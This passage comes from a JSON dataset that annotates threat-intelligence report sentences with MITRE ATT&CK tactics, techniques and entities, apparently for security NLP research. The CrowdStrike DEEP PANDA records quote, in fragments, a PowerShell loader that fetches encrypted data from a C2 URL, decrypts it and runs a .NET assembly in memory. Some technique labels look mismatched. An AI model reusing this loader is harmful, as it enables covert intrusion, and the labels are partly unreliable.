"start": 80, "end": 89, "label": "MalwareTool" }, { "text": "MemLoader HidenDesk", "start": 93, "end": 112, "label": "MalwareTool" }, { "text": "WhatsApp ", "start": 45, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "exfiltrates ", "start": 17, "end": 29, "label": "Action" }, { "text": "employs ", "start": 58, "end": 66, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s47-658abe", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.", "sentence_text": "According to Kaspersky, Librarian Ghouls APT continues its series of attacks on Russian entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s48-6b2a44", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "According to Kaspersky, Librarian Ghouls APT continues its series of attacks on Russian entities.", "sentence_text": "A detailed analysis of a malicious campaign utilizing RAR archives and BAT scripts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s49-4378c7", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "A detailed analysis of a malicious campaign utilizing RAR archives and BAT scripts.", "sentence_text": "Subscribe to our weekly e-mails The hottest research right in your inbox Δ Threats Threats APT (Targeted attacks)\nSecure environment (IoT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s50-1efb0a", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "Subscribe to our weekly e-mails The hottest research right in your inbox Δ Threats Threats APT (Targeted attacks)\nSecure environment (IoT)", "sentence_text": "Mobile threats\nFinancial threats\nSpam and phishing Industrial threats Web threats Vulnerabilities and exploits All threats Categories Categories APT reports Malware descriptions Security Bulletin Malware reports Spam and phishing reports Security technologies Research Publications All categories Other sections", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s51-c8b7d4", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Mobile threats\nFinancial threats\nSpam and phishing Industrial threats Web threats Vulnerabilities and exploits All threats Categories Categories APT reports Malware descriptions Security Bulletin Malware reports Spam and phishing reports Security technologies Research Publications All categories Other sections", "sentence_text": "Archive All tags Webinars APT Logbook Statistics Encyclopedia Threats descriptions KSB 2024 Kaspersky ICS CERT Registered trademarks and service marks are the property of their respective owners.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s52-72f9c0", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Archive All tags Webinars APT Logbook Statistics Encyclopedia Threats descriptions KSB 2024 Kaspersky ICS CERT Registered trademarks and service marks are the property of their respective owners.", "sentence_text": "Privacy Policy\nLicense Agreement\nCookies\n[FILTERED_TABLES_START]\n1 | http : //C2_DOMAIN_IP/chapter1/user.html/BASE64_RC4_ENCRYPTED_BODY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s1-e0c3ad", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Deep in Thought: Chinese Targeting of National Security Think Tanks » 113 captures 15 Dec 2015 - 09 Sep 2024 success fail About this capture COLLECTED BY Collection:\nGDELT Project\nTIMESTAMPS\nThe Wayback Machine - https://web.archive.org/web/20200424075623/https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/ Our website uses cookies to enhance your browsing experience.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s2-bcbe8d", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Deep in Thought: Chinese Targeting of National Security Think Tanks » 113 captures 15 Dec 2015 - 09 Sep 2024 success fail About this capture COLLECTED BY Collection:\nGDELT Project\nTIMESTAMPS\nThe Wayback Machine - https://web.archive.org/web/20200424075623/https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/ Our website uses cookies to enhance your browsing experience.", "sentence_text": "Please note that by continuing to use this website you consent to the terms of our Privacy Policy CONTINUE TO SITE > July 7, 2014 Dmitri Alperovitch Executive Viewpoint", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s3-61eb19", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Please note that by continuing to use this website you consent to the terms of our Privacy Policy CONTINUE TO SITE > July 7, 2014 Dmitri Alperovitch Executive Viewpoint", "sentence_text": "For some time now, CrowdStrike has been working with a number of national security think tanks and human rights organizations on a pro bono basis to help them with their security posture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s4-e1c1f3", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "For some time now, CrowdStrike has been working with a number of national security think tanks and human rights organizations on a pro bono basis to help them with their security posture.", "sentence_text": "The intelligence services of these nation states are always on the lookout for any clues they may extract from such private communications that may give them an advanced insight into what options government policy makers are considering on particular issues of interest.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1114", "name": "Email Collection" } ], "procedure": "Extracts intelligence from private communications of policy makers", "entities": [ { "text": " private communications ", "start": 115, "end": 139, "label": "Infrastructure_Indicator" }, { "text": "government policy makers", "start": 196, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "extract ", "start": 98, "end": 106, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s5-4835f7", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "The intelligence services of these nation states are always on the lookout for any clues they may extract from such private communications that may give them an advanced insight into what options government policy makers are considering on particular issues of interest.", "sentence_text": "At the same time, with access to the victim email mailboxes, the adversaries can craft very realistic spear-phishing lures to the government contacts of targeted think tank personnel by piggybacking on ongoing real conversations and increasing their chances of a successful compromise of an official government email account.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Crafts spear-phishing lures by leveraging access to victim email conversations to compromise government accounts.", "entities": [ { "text": "victim email mailboxes", "start": 37, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "craft very realistic spear-phishing lures", "start": 81, "end": 122, "label": "Action" }, { "text": "government contacts", "start": 130, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "piggybacking on ongoing real conversations", "start": 186, "end": 228, "label": "Action" }, { "text": "compromise of an official government email account", "start": 274, "end": 324, "label": "Action" }, { "text": "official government email account", "start": 291, "end": 324, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-78_mitre_report-p1-s6-bd4dde", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "At the same time, with access to the victim email mailboxes, the adversaries can craft very realistic spear-phishing lures to the government contacts of targeted think tank personnel by piggybacking on ongoing real conversations and increasing their chances of a successful compromise of an official government email account.", "sentence_text": "Despite this high threat level, these think tanks are organized as non-profits and often do not have the budgets of commercial organizations to afford cutting-edge security technologies that can help them effectively detect these threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s7-3bfc91", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "Despite this high threat level, these think tanks are organized as non-profits and often do not have the budgets of commercial organizations to afford cutting-edge security technologies that can help them effectively detect these threats.", "sentence_text": "However, last week the unprecedented real-time visibility provided by Falcon Host into this actor’s escapades allowed analysts to observe a radical change in targeting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s8-9afad5", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "However, last week the unprecedented real-time visibility provided by Falcon Host into this actor’s escapades allowed analysts to observe a radical change in targeting.", "sentence_text": "This actor, who was engaged in targeting and collection of Southeast Asia policy information, suddenly began targeting individuals with a tie to Iraq/Middle East issues.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": null, "procedure": "The actor conducts intelligence collection and shifts targeting from Southeast Asia policy entities to individuals related to Iraq and Middle East issues.", "entities": [ { "text": "This actor", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "engaged in targeting and collection of Southeast Asia policy information", "start": 20, "end": 92, "label": "Action" }, { "text": "began targeting individuals with a tie to Iraq/Middle East issues", "start": 103, "end": 168, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s9-eefb3f", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "This actor, who was engaged in targeting and collection of Southeast Asia policy information, suddenly began targeting individuals with a tie to Iraq/Middle East issues.", "sentence_text": "This is undoubtedly related to the recent Islamic State of Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil interests in that country.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s10-cc4523", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "This is undoubtedly related to the recent Islamic State of Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil interests in that country.", "sentence_text": "In fact, Iraq happens to be the fifth-largest source of crude oil imports for China and the country is the largest foreign investor in Iraq’s oil sector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s11-7c9280", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "In fact, Iraq happens to be the fifth-largest source of crude oil imports for China and the country is the largest foreign investor in Iraq’s oil sector.", "sentence_text": "Thus, it wouldn’t be surprising if the Chinese government is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that could help protect the Chinese oil infrastructure in Iraq.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s12-9dd98d", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "Thus, it wouldn’t be surprising if the Chinese government is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that could help protect the Chinese oil infrastructure in Iraq.", "sentence_text": "Recently, we detected breaches of these networks via the use of powershell scripts deployed by the adversary as scheduled tasks on Windows machines.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" }, { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Deployed PowerShell scripts via scheduled tasks", "entities": [ { "text": " powershell scripts ", "start": 63, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 83, "end": 92, "label": "Action" }, { "text": "Windows machines", "start": 131, "end": 147, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-78_mitre_report-p1-s13-ad7cf9", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Recently, we detected breaches of these networks via the use of powershell scripts deployed by the adversary as scheduled tasks on Windows machines.", "sentence_text": "The scripts are passed to the powershell interpreter through the command line to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of Compromise (IOC)-based detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Passes scripts to PowerShell interpreter via command line to avoid file-based detection", "entities": [ { "text": "powershell interpreter", "start": 30, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "victim machine", "start": 124, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "passed ", "start": 16, "end": 23, "label": "Action" }, { "text": "avoid ", "start": 81, "end": 87, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s14-8ae1f2", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "The scripts are passed to the powershell interpreter through the command line to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of Compromise (IOC)-based detection.", "sentence_text": "The scripts were scheduled to call back every two hours to the DEEP PANDA Command and Control (C2) infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1029", "name": "Scheduled Transfer" } ], "procedure": "Scheduled scripts to call back to C2 infrastructure every two hours", "entities": [ { "text": "DEEP PANDA", "start": 63, "end": 73, "label": "ThreatActor" }, { "text": "Command and Control (C2) infrastructure", "start": 74, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "call back", "start": 30, "end": 39, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s15-458cc8", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "The scripts were scheduled to call back every two hours to the DEEP PANDA Command and Control (C2) infrastructure.", "sentence_text": "The script in the command line is base64 encoded, but when decoded it translates to the following code snippet:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Uses base64 encoding for script in command line", "entities": [ { "text": "base64 encoded", "start": 34, "end": 48, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s17-ce946c", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "[System.", "sentence_text": "Net.ServicePointManager]::ServerCertificateValidationCallback", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s18-5e8e0c", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Net.ServicePointManager]::ServerCertificateValidationCallback", "sentence_text": "= {$true} $wc = New-Object -TypeName System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s20-5c1b8d", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Net.", "sentence_text": "WebClient $wc.Headers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s21-1b8e9e", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "WebClient $wc.Headers.", "sentence_text": "+ ([IntPtr]::Size – 1).ToString())\n$wc.Headers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s22-137e21", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "+ ([IntPtr]::Size – 1).ToString())\n$wc.Headers.", "sentence_text": "Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)”)\n$rndn = Get-Random $wc.Headers.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Adds spoofed User-Agent header to web client", "entities": [ { "text": "User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)”", "start": 5, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "Add", "start": 0, "end": 3, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s23-cebd36", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)”)\n$rndn = Get-Random $wc.Headers.", "sentence_text": "Add(“Cookie”, “p=” + $rndn)\n$data = $wc.DownloadData(“https:///config/oauth/”)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Downloads data from C2 server via HTTPS", "entities": [ { "text": "https:///config/oauth/", "start": 54, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "DownloadData", "start": 40, "end": 52, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s24-815613", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "Add(“Cookie”, “p=” + $rndn)\n$data = $wc.DownloadData(“https:///config/oauth/”)", "sentence_text": "[string[]]$xags = “https:///config/login/”, “WMITool.Program”, “Main”, “/f”, “ssh”, “/s”, “”, “/p”, “443” $Passphrase = “” $salts = “” $r = new-Object System.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Configures C2 connection parameters and authentication", "entities": [ { "text": "WMITool", "start": 57, "end": 64, "label": "MalwareTool" }, { "text": "https:///config/login/", "start": 19, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "ssh", "start": 90, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "443", "start": 125, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "salts ", "start": 160, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "Passphrase ", "start": 131, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-78_mitre_report-p1-s27-41b709", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "Cryptography.", "sentence_text": "RijndaelManaged $pass = [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s29-8dc891", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "Text.", "sentence_text": "Encoding]::UTF8.GetBytes($Passphrase)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s30-d58821", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "Encoding]::UTF8.GetBytes($Passphrase)", "sentence_text": "$salt = [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s31-8af737", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "$salt = [System.", "sentence_text": "Text.Encoding]::UTF8.GetBytes($salts)\n$r.Key = (new-Object Security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s32-7210ce", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Text.Encoding]::UTF8.GetBytes($salts)\n$r.Key = (new-Object Security.", "sentence_text": "Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1”, 5).GetBytes(32) #256/8 $r.IV = (new-Object Security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s33-9a547b", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1”, 5).GetBytes(32) #256/8 $r.IV = (new-Object Security.", "sentence_text": "Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($rndn) )", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Computes SHA1 hash for cryptographic operations", "entities": [ { "text": "ComputeHash", "start": 26, "end": 37, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s34-27e3e3", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($rndn) )", "sentence_text": "[0..15]\n$d = $r.CreateDecryptor()\n$ms = new-Object IO.MemoryStream @(,$data)\n$cs = new-Object Security.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Creates decryptor and memory stream for encrypted data", "entities": [ { "text": "CreateDecryptor", "start": 16, "end": 31, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s35-37627f", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "[0..15]\n$d = $r.CreateDecryptor()\n$ms = new-Object IO.MemoryStream @(,$data)\n$cs = new-Object Security.", "sentence_text": "Cryptography.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s36-1b8a3b", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Cryptography.", "sentence_text": "IO.Compression.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s37-0ccc48", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "IO.Compression.", "sentence_text": "GzipStream $cs, ([IO.Compression.CompressionMode]::Decompress)\n$msout = New-Object System.IO.MemoryStream", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s38-3654a0", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "GzipStream $cs, ([IO.Compression.CompressionMode]::Decompress)\n$msout = New-Object System.IO.MemoryStream", "sentence_text": "[byte[]]$buffer = new-object byte[] 4096", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s39-eabd6a", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "[byte[]]$buffer = new-object byte[] 4096", "sentence_text": "[int]$count = 0 do { $count = $dfs.Read($buffer, 0, $buffer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s40-ebd4c0", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "[int]$count = 0 do { $count = $dfs.Read($buffer, 0, $buffer.", "sentence_text": "Length)\n$msout.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s41-ee9b78", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Length)\n$msout.", "sentence_text": "Close()\n$cs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s42-b40a25", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Close()\n$cs.", "sentence_text": "Close()\n$ms.Close()\n$r.Clear()", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s43-13e972", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Close()\n$ms.Close()\n$r.Clear()", "sentence_text": "[byte[]]$bin = $msout.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s44-044ceb", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "[byte[]]$bin = $msout.", "sentence_text": "ToArray()\n$al = New-Object -TypeName System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s45-790546", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "ToArray()\n$al = New-Object -TypeName System.", "sentence_text": "Collections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s46-cfc5d1", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Collections.", "sentence_text": "ArrayList $al.Add($xags)\n$asm = [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s47-29dcaf", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "ArrayList $al.Add($xags)\n$asm = [System.", "sentence_text": "Reflection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s48-16ef89", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "Reflection.", "sentence_text": "Assembly]::Load($bin)\n$asm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s49-c58729", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "Assembly]::Load($bin)\n$asm.", "sentence_text": "EntryPoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s50-f2a683", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "EntryPoint.", "sentence_text": "Invoke($null, $al.ToArray())\nsleep 5\nExit\nOnce executed, it downloads and executes from memory a .NET executable (typically named Wafer), which in turn typically downloads and runs MadHatter .NET", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloads and executes Wafer, which then downloads and runs MadHatter", "entities": [ { "text": "downloads ", "start": 60, "end": 70, "label": "Action" }, { "text": "executes ", "start": 74, "end": 83, "label": "Action" }, { "text": "runs ", "start": 176, "end": 181, "label": "Action" }, { "text": "Wafer", "start": 130, "end": 135, "label": "MalwareTool" }, { "text": "MadHatter ", "start": 181, "end": 191, "label": "MalwareTool" } ] }, { "uid": "mitre-78_mitre_report-p1-s51-6a6f8c", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Invoke($null, $al.ToArray())\nsleep 5\nExit\nOnce executed, it downloads and executes from memory a .NET executable (typically named Wafer), which in turn typically downloads and runs MadHatter .NET", "sentence_text": "Remote Access Tool (RAT), one of the favorites of DEEP PANDA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s52-7a8d52", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Remote Access Tool (RAT), one of the favorites of DEEP PANDA.", "sentence_text": "By running them from memory, it leaves no disk artifacts or host-based IOCs that can be identified in forensic analysis.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.004", "name": "Compile After Delivery" } ], "procedure": "Runs tools from memory to avoid disk artifacts", "entities": [ { "text": "running ", "start": 3, "end": 11, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s53-5d926d", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "By running them from memory, it leaves no disk artifacts or host-based IOCs that can be identified in forensic analysis.", "sentence_text": "This is typical for DEEP PANDA — stealth is their specialty and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Operates stealthily to leave minimal footprint and evade detection", "entities": [ { "text": "DEEP PANDA ", "start": 20, "end": 31, "label": "ThreatActor" }, { "text": " victim system", "start": 132, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "operate ", "start": 79, "end": 87, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s54-cf0e50", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "This is typical for DEEP PANDA — stealth is their specialty and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.", "sentence_text": "The adversary used stolen credentials to mount network shares via “net use” command.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.002", "name": "SMB/Windows Admin Shares" } ], "procedure": "Mounted network shares using stolen credentials via net use command", "entities": [ { "text": "stolen credentials", "start": 19, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "network shares ", "start": 47, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "mount ", "start": 41, "end": 47, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s55-bdd913", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "The adversary used stolen credentials to mount network shares via “net use” command.", "sentence_text": "After using compromised credentials to mount file shares, the adversary was seen compressing data using 7-zip.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Compressed data using 7-zip after mounting file shares", "entities": [ { "text": "compressing ", "start": 81, "end": 93, "label": "Action" }, { "text": "compromised credentials", "start": 12, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "file shares", "start": 45, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "7-zip", "start": 104, "end": 109, "label": "MalwareTool" } ] }, { 